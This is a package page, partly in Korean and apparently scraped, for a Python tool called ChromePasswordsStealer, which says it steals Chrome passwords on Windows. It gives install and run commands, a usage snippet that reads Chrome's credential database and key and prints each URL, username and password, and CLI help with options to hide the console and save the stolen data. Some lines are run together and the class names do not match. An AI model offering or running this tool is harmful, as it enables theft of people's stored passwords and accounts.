ChromePasswordsStealer
v1.0.1 ChromePasswordStealer
이 모듈은 Windows에서 크롬과 크롬 암호를 훔칩니다.
이 패키지는 다음과 같습니다.
pip install ChromePasswordsStealer # Python executable
python3 ChromePasswordsStealer.pyz -h
# or
chmod u+x ChromePasswordsStealer.pyz
./ChromePasswordsStealer.pyz --help
# Python module
python3 -m ChromePasswordsStealer
# Entry point (console)
ChromeStealer --save-all --window -f passwords from ChromePasswordsStealer import ChromePasswordsStealer
stealer = ChromePasswordsStealer ()
stealer = ChromiumPasswordsStealer ( "passwords" , True )
stealer . get_database_cursor ()
stealer . get_key ()
for url , username , password in stealer . get_credentials ():
print ( url , username , password )
stealer . save_and_clean () ~# python3 ChromePasswordsStealer.py -h
usage: ChromePasswordsStealer.py [-h] [--filename FILENAME] [--window] [--save-all]
This program steals Chrome passwords on Windows.
optional arguments:
-h, --help show this help message and exit
--filename FILENAME, -f FILENAME
The filename to export the credentials.
--window, -w Do not hide the console.
--save-all, -s Save chrome db, key file and key.
GPL, 버전 3에 따라 라이센스가 부여되었습니다.